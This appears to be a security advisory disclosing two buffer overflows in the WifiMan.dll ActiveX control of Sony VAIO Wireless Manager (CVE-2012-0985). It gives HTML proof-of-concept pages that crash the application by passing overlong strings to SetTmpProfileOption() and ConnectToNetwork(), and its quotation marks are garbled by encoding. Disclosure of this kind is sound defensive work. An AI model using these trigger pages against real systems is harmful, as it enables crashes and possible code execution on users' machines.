High-Tech BridgeHTB230632 Buffer Overflows in Wireless Manager Sony VAIO
EPSS
Percentile
96.6%
High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system.
- Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985
1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid=βclsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}β></object>
< SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, βXβ)
arg3=βdefaultVβ
ctrl.SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value=βSony_POCβ>
</BODY>
</HTML>
1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid=βclsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}β></object>
< SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, βXβ)
ctrl.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value=βSony_POCβ>
</BODY>
</HTML>
Related
